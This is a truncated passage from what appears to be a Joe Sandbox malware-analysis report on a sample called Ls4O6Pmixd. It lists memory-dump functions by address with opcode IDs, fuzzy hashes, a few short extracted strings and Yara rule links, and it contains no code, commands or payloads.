                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: eeb9d552244a4c87190f636aa68084b4a1f8ef3875d59d6a98dfbf2288574489
                                                                                            • Instruction ID: 4af8dcf20dd84bec561a647b66ed0bcf6cbf07fff960dedbbb4530a222ed1256
                                                                                            • Opcode Fuzzy Hash: eeb9d552244a4c87190f636aa68084b4a1f8ef3875d59d6a98dfbf2288574489
                                                                                            • Instruction Fuzzy Hash: 3F91D4B2A1EA868FF6A4DB18D4459BA73D2EFD5300F044579E04EC7296EE34EC4587C1
                                                                                            Function 00007FFAAC52CB22 Relevance: .2, Instructions: 230COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 14d2b7888fc562e830adc6cda51fe676b62b85e0ca040322bf505b7ca72547a9
                                                                                            • Instruction ID: ee16d50195ae38639211f80377aa1c2a5860ab772a3536582e836e7e964c606e
                                                                                            • Opcode Fuzzy Hash: 14d2b7888fc562e830adc6cda51fe676b62b85e0ca040322bf505b7ca72547a9
                                                                                            • Instruction Fuzzy Hash: 95611232749A468FF758972C985616977D7EFD622074A42B9E00ECB3D3ED38EC068781
                                                                                            Function 00007FFAAC5207A7 Relevance: .2, Instructions: 216COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c20bcb38a2d04743d67758e6e40e518ea1fcf46547ebc6d622d48e9c7949101b
                                                                                            • Instruction ID: 9a8ab27840f751cd64f474589cbf5c629ad41dbbfe1ed5b230ac9a98edef9488
                                                                                            • Opcode Fuzzy Hash: c20bcb38a2d04743d67758e6e40e518ea1fcf46547ebc6d622d48e9c7949101b
                                                                                            • Instruction Fuzzy Hash: DE510233719A098FB75C9B2C985617973D7EBD622075A4279E00ECB3D6EE34EC068781
                                                                                            Function 00007FFAAC529271 Relevance: .1, Instructions: 135COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a1c74aef45d0337adda0e228aee12a4b24c2be3a7bc0035893a7bb3615868ea4
                                                                                            • Instruction ID: 765226ad496a1c6df586b5a2218106cc1a63b8ba94cca00669d333a2d246b1af
                                                                                            • Opcode Fuzzy Hash: a1c74aef45d0337adda0e228aee12a4b24c2be3a7bc0035893a7bb3615868ea4
                                                                                            • Instruction Fuzzy Hash: 40313C236693810FA35C863C98630717BD9FB56315318A67EF4D7C76D3E91CD80B8286
                                                                                            Function 00007FFAAC520950 Relevance: .1, Instructions: 106COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 40092e5ed39d7c66830fca5108c9eccdae0c25ef3e87473a5f69d43b2372c4ed
                                                                                            • Instruction ID: 481facb2cdae67fd0601cab7771f1f90108a918fc7df3c06262597e738b4ed89
                                                                                            • Opcode Fuzzy Hash: 40092e5ed39d7c66830fca5108c9eccdae0c25ef3e87473a5f69d43b2372c4ed
                                                                                            • Instruction Fuzzy Hash: C32149327B52420B631C893D982317172DAFB4A706324B63DF4DBC66C7E91CE80B86C6
                                                                                            Function 00007FFAAC54F69D Relevance: 1.7, APIs: 1, Instructions: 248libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: fc7794580372d556f64b50776c18f8e9753087b068659462cb486e764185a06e
                                                                                            • Instruction ID: 5f4072158b76c03411a8bf0da2a9ad1f41d95cb78e4404cab96fc65feda83c1a
                                                                                            • Opcode Fuzzy Hash: fc7794580372d556f64b50776c18f8e9753087b068659462cb486e764185a06e
                                                                                            • Instruction Fuzzy Hash: 5071E570948A8D8FEB58DF6CC8556E43BE1FF59301F10826EE84EC7292DA39D845CB91
                                                                                            Function 00007FFAAC5E09F5 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432859558.00007FFAAC5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac5e0000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0D
                                                                                            • API String ID: 0-1885526165
                                                                                            • Opcode ID: 74c92ce4c74ea9e54725758ce7ff0af2cc79e7f19053d60b9e5591cde285a9a5
                                                                                            • Instruction ID: 3febbecf3574000143e93d12d0176b165ae0ccedc5a57ff992c6c568b1836dab
                                                                                            • Opcode Fuzzy Hash: 74c92ce4c74ea9e54725758ce7ff0af2cc79e7f19053d60b9e5591cde285a9a5
                                                                                            • Instruction Fuzzy Hash: 2D21EE6294E7D64FE353973858651E47FE5DF97110B4E41F7D088CF1A3EA188C498391
                                                                                            Function 00007FFAAC5E0457 Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432859558.00007FFAAC5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac5e0000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 8e
                                                                                            • API String ID: 0-1620073548
                                                                                            • Opcode ID: aa88c8f5b20b892bd4e2df5848583c6f1d1bd3419b7099043bd544baab482063
                                                                                            • Instruction ID: 91dcce47c4da3adf4ab3e7688495e9b2031dd541ce3a3cccdbe4e772a0ef1ea9
                                                                                            • Opcode Fuzzy Hash: aa88c8f5b20b892bd4e2df5848583c6f1d1bd3419b7099043bd544baab482063
                                                                                            • Instruction Fuzzy Hash: 82E0C213B9AD1E0BA19899CE3C9617833C4C3CE422740027BE44EC2389DC094C8702C2
                                                                                            Function 00007FFAAC5E4791 Relevance: .2, Instructions: 228COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432859558.00007FFAAC5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac5e0000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 089a2b413ae3a2fe11a04edb2745595e1eeb84df9000af8ca99d080a1d02075a
                                                                                            • Instruction ID: ab1fcd7ffae82835cd4bd9e8379a85b92477a9786062173bd85446482a5dfe13
                                                                                            • Opcode Fuzzy Hash: 089a2b413ae3a2fe11a04edb2745595e1eeb84df9000af8ca99d080a1d02075a
                                                                                            • Instruction Fuzzy Hash: 21519F62A4EBC64FE75787A458651A07FA4EF57110B0A41FBE08DCB5A3DF089C1A83D2
                                                                                            Function 00007FFAAC5E46D5 Relevance: .1, Instructions: 89COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432859558.00007FFAAC5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac5e0000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 15c4a2419ca5be3146ecd5bf0e8b00f05513a8da7fb6b79f50993f9d718930fd
                                                                                            • Instruction ID: 96c1294de81aa1a7ae61b0766cf85e2aca28ac35315673e284f8c90c9fc44776
                                                                                            • Opcode Fuzzy Hash: 15c4a2419ca5be3146ecd5bf0e8b00f05513a8da7fb6b79f50993f9d718930fd
                                                                                            • Instruction Fuzzy Hash: 0A21019294FBC64FE35343694C641A17FE1DF93110B0E41E7E089CB5A3DA088C1A83D2
                                                                                            Function 00007FFAAC5E37D1 Relevance: .1, Instructions: 79COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432859558.00007FFAAC5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac5e0000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 14f90b70446207f0a89286edde70b1b2e703133f125dc5d489c85c445c6bd0e2
                                                                                            • Instruction ID: 225124b298ff454e114d3e1e755e808e4480dd4333f675cfa88924b55e594147
                                                                                            • Opcode Fuzzy Hash: 14f90b70446207f0a89286edde70b1b2e703133f125dc5d489c85c445c6bd0e2
                                                                                            • Instruction Fuzzy Hash: 45218E6294FBC64FE397832C98292647FE19F57110F4E41FBD088CB1A3DA18DC098392
                                                                                            Function 00007FFAAC5E0ABD Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432859558.00007FFAAC5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac5e0000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5725d17db032c0d9d2ea1ca5a29bfe67d3e15bca05160a2b38f72e9fad60dc1c
                                                                                            • Instruction ID: b10a162c06a99f2abae47e857c99c02514d9b3c6ccadede760fbd5b39a238e55
                                                                                            • Opcode Fuzzy Hash: 5725d17db032c0d9d2ea1ca5a29bfe67d3e15bca05160a2b38f72e9fad60dc1c
                                                                                            • Instruction Fuzzy Hash: A7119D6114F7C64FE347A7744C259A57FE4AF83104B4E85EBD0C9CB4A3DA199809D362
                                                                                            Function 00007FFAAC5E43AD Relevance: .1, Instructions: 71COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432859558.00007FFAAC5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac5e0000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5fcacedcfedc35689ee472f2314a7a02742fa04c4496785c26ea06b18d0bf15c
                                                                                            • Instruction ID: b0f0f9dd72ff3007db99aca422d495ed2ae60b6e90ee0f3434cf2d46a8f7b427
                                                                                            • Opcode Fuzzy Hash: 5fcacedcfedc35689ee472f2314a7a02742fa04c4496785c26ea06b18d0bf15c
                                                                                            • Instruction Fuzzy Hash: 67110452A4EF9B0FF3A5C79C68951706AC6DFD9210B4840BBE10DC32A6DF09EC4943C1
                                                                                            Function 00007FFAAC5E3571 Relevance: .1, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432859558.00007FFAAC5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac5e0000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 697f6b7772fd9dd801e7790058aa8134b127585d216db1880428b44edee37501
                                                                                            • Instruction ID: e71202dffa74b40123f4ef5c47f50e931300b40527f0144a0fdbae36639f7c1c
                                                                                            • Opcode Fuzzy Hash: 697f6b7772fd9dd801e7790058aa8134b127585d216db1880428b44edee37501
                                                                                            • Instruction Fuzzy Hash: 7111618258F7C25FE35743786C7A2B53FA4AF53111B0D41E7E488CB6A3D909991EC392
                                                                                            Function 00007FFAAC5E340D Relevance: .1, Instructions: 64COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432859558.00007FFAAC5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac5e0000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9fdc5d3b858282d0b0cf13eb4eae32f31d65d32cc5345610a6cec452a98728ff
                                                                                            • Instruction ID: 464ced68056fe7ae21191d57d65b7eb33463aae117100c6e413498f6a1bb7880
                                                                                            • Opcode Fuzzy Hash: 9fdc5d3b858282d0b0cf13eb4eae32f31d65d32cc5345610a6cec452a98728ff
                                                                                            • Instruction Fuzzy Hash: FC017C5290FBD28FE3A7877C986A1647FA0EF1711074E45EBD089CB4E3D90A98498382
                                                                                            Function 00007FFAAC5E048E Relevance: .1, Instructions: 64COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432859558.00007FFAAC5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac5e0000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bc535a77064318c085dd823658832a2ad7fb3e7cf5c3a9d7eb287b4748a6a4b0
                                                                                            • Instruction ID: 8d5c2971da8bd9571af849b6dd6525b557b36cbaae899b08acc19da470d1dc82
                                                                                            • Opcode Fuzzy Hash: bc535a77064318c085dd823658832a2ad7fb3e7cf5c3a9d7eb287b4748a6a4b0
                                                                                            • Instruction Fuzzy Hash: 2F11618284E7C24FE3175378582A5747FF49E53111B0E41D7E0C9CB1A3EA089919D3E3
                                                                                            Function 00007FFAAC5E53CC Relevance: .0, Instructions: 15COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432859558.00007FFAAC5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac5e0000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 487160129ed99f6292d663e6089c135d04aaa0554b507d40b37fed481d451e0e
                                                                                            • Instruction ID: b16f13125cb95f86ec4d26c61661483a6f4f4eeaa952008087e3456ecad76514
                                                                                            • Opcode Fuzzy Hash: 487160129ed99f6292d663e6089c135d04aaa0554b507d40b37fed481d451e0e
                                                                                            • Instruction Fuzzy Hash: 18C04C01F5DC5E1A64D8A26CB805AA891C6DBC81B17AC42B2E80DC225EDC18998303C5

                                                                                            Non-executed Functions

                                                                                            Function 00007FFAAC53B9F2 Relevance: 2.9, Strings: 2, Instructions: 392COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: "9$"9
                                                                                            • API String ID: 0-2374823114
                                                                                            • Opcode ID: 7c89728b7a630a65fc2e633da93ff2e85c5d86e6e0791398dd159fc7a0ee0790
                                                                                            • Instruction ID: 644108bb7dc5e106d0e3385bb251866de1e99ca523fbcf921f6537f78f52a887
                                                                                            • Opcode Fuzzy Hash: 7c89728b7a630a65fc2e633da93ff2e85c5d86e6e0791398dd159fc7a0ee0790
                                                                                            • Instruction Fuzzy Hash: 9DC17B62BAD7474BF319AB2CE8A10F47785EF92315754817ED08ECB753ED18A80A82C4
                                                                                            Function 00007FFAAC53301D Relevance: 1.6, Strings: 1, Instructions: 365COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: "9
                                                                                            • API String ID: 0-1061052283
                                                                                            • Opcode ID: 12707c92e4336729543c061315686c1353ffbeb3ccbc94f9f0b2786154141ef0
                                                                                            • Instruction ID: 7e7047ec81fe5222a685c5f99a2e281402d558468f22cbe73a6f4156f04ea6bb
                                                                                            • Opcode Fuzzy Hash: 12707c92e4336729543c061315686c1353ffbeb3ccbc94f9f0b2786154141ef0
                                                                                            • Instruction Fuzzy Hash: F4D17470E0564A8FDB09CF9CC5915BEB7F1EF45300B248169E44AFB341DA359E05CBA1
                                                                                            Function 00007FFAAC5207B8 Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: r6
                                                                                            • API String ID: 0-2984296541
                                                                                            • Opcode ID: b8f6416cadff691bb5a860b348a1b2f0a69864e3c1c5fb56579537aea0460f01
                                                                                            • Instruction ID: 90c5248f13f6b6934cf6066a5c89e9d54f1f59befefd3496d3964342461a9a52
                                                                                            • Opcode Fuzzy Hash: b8f6416cadff691bb5a860b348a1b2f0a69864e3c1c5fb56579537aea0460f01
                                                                                            • Instruction Fuzzy Hash: D3811733A5960A8BFB5CDB5898551B873D7EFC6350F15813EE04E97292EE34B80686C1
                                                                                            Function 00007FFAAC5205D5 Relevance: 1.5, Strings: 1, Instructions: 251COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0W
                                                                                            • API String ID: 0-1461859783
                                                                                            • Opcode ID: b5e710f4c4d03198845ee9e8ebb290f28f59f323f6a7de56765144007a41fd6d
                                                                                            • Instruction ID: 560529f7ca06702921e8e7e4bdbdb1931e12b5f385335ee1fa337a94e80cab6d
                                                                                            • Opcode Fuzzy Hash: b5e710f4c4d03198845ee9e8ebb290f28f59f323f6a7de56765144007a41fd6d
                                                                                            • Instruction Fuzzy Hash: BD614831B4AB0A8FE79CA77C989527937D6EFDA21174441B9F00ECB392DD24EC468381
                                                                                            Function 00007FFAAC532791 Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ("\
                                                                                            • API String ID: 0-3175161478
                                                                                            • Opcode ID: d69eb80250e31790f5c35e6c51aa5aaab835412205f10a6308051dd342935359
                                                                                            • Instruction ID: aa25894bdfb9d569a2173d7fc54ff341383bdbc35f451d8b088466f85fef5d52
                                                                                            • Opcode Fuzzy Hash: d69eb80250e31790f5c35e6c51aa5aaab835412205f10a6308051dd342935359
                                                                                            • Instruction Fuzzy Hash: 79418B72758B0B0BA74CD66DACD61B977C6EB99210358427EE50ECB393E851DC0A83C5
                                                                                            Function 00007FFAAC52B948 Relevance: 1.4, Strings: 1, Instructions: 178COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ("\
                                                                                            • API String ID: 0-3175161478
                                                                                            • Opcode ID: 5c9933f4ccadf7c1e02878850c4d3a7625aabebce0a093940a5265ae9bddf4d1
                                                                                            • Instruction ID: ad8736bfc68eddfb92a78cf0194288b69828d92d4dd85e8ddf16e464c2d8f61f
                                                                                            • Opcode Fuzzy Hash: 5c9933f4ccadf7c1e02878850c4d3a7625aabebce0a093940a5265ae9bddf4d1
                                                                                            • Instruction Fuzzy Hash: AD417872758B0B0BA74CD99DACC6179B6C6EB98300354827EE50ECB397EC51EC0A83C5
                                                                                            Function 00007FFAAC52A479 Relevance: 1.4, Strings: 1, Instructions: 170COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: MQ3X
                                                                                            • API String ID: 0-3030361997
                                                                                            • Opcode ID: b0a5c9767c625bb34104c938c19bfd568a28c81f291404e8d93d77c381538c2e
                                                                                            • Instruction ID: 25dcbb7bd632bd4d0b3fe1e327a73ade2726255fe83727e4f56f175cca8db98c
                                                                                            • Opcode Fuzzy Hash: b0a5c9767c625bb34104c938c19bfd568a28c81f291404e8d93d77c381538c2e
                                                                                            • Instruction Fuzzy Hash: 13514D2364D7824FE71E87399C610617BD79FC622031D42BAD49ACF1D7DD38E81A8781
                                                                                            Function 00007FFAAC52A500 Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: MQ3X
                                                                                            • API String ID: 0-3030361997
                                                                                            • Opcode ID: 59bc3337cf87a68648bf4d4c7180c5c1516f84d38707fe570a4dbcc56d7d2066
                                                                                            • Instruction ID: 2c4ba1d0fe1548d24dd9177726f34123088ae67e063e068949dfe267a5004f1b
                                                                                            • Opcode Fuzzy Hash: 59bc3337cf87a68648bf4d4c7180c5c1516f84d38707fe570a4dbcc56d7d2066
                                                                                            • Instruction Fuzzy Hash: 9D3127337545024B671C9A2E9951076B2D7EBD8320329863EE49BDB2C8DE38E85B8685
                                                                                            Function 00007FFAAC5382E8 Relevance: .4, Instructions: 381COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 37c8e3648e95f84210cbebc4416dadcb592f91653749d37fd3ab721595903973
                                                                                            • Instruction ID: 11fe12bf5cf84a42cdc4bfb3be4233a69ac2acca501d145a24f282b280d100c7
                                                                                            • Opcode Fuzzy Hash: 37c8e3648e95f84210cbebc4416dadcb592f91653749d37fd3ab721595903973
                                                                                            • Instruction Fuzzy Hash: DCA1AC7294E74E4FF3299B6898955B177D8EF92310B1441BDE48FC7683E819E84AC3D0
                                                                                            Function 00007FFAAC52B030 Relevance: .4, Instructions: 370COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d7248d16a0ec8976464072b38734a707a3130957d6da144d8952e35bdc4ea1d0
                                                                                            • Instruction ID: af59f975ce496eefe45002dff44a1c398465d3af930c03b07747eb438b4e83d2
                                                                                            • Opcode Fuzzy Hash: d7248d16a0ec8976464072b38734a707a3130957d6da144d8952e35bdc4ea1d0
                                                                                            • Instruction Fuzzy Hash: 67A1792276CB0F4BA32CBDACAC5A17576C6D794210F44823EE84ACB7D2FD54DD0A82C4
                                                                                            Function 00007FFAAC520C08 Relevance: .3, Instructions: 333COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ff1a0e90a7588b159f659cfeeca6515acb25392829ba29b6eec0598cdc7eef03
                                                                                            • Instruction ID: 2a2f498d2cbf86236ed95b28d920f1430289997ec7651ecf882b174802d40ac3
                                                                                            • Opcode Fuzzy Hash: ff1a0e90a7588b159f659cfeeca6515acb25392829ba29b6eec0598cdc7eef03
                                                                                            • Instruction Fuzzy Hash: 0491AB61BA870E4BA75CBD5C9C6213976C5DB95610F44813EF98BC73D2FE24EC0A82C1
                                                                                            Function 00007FFAAC534141 Relevance: .3, Instructions: 309COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
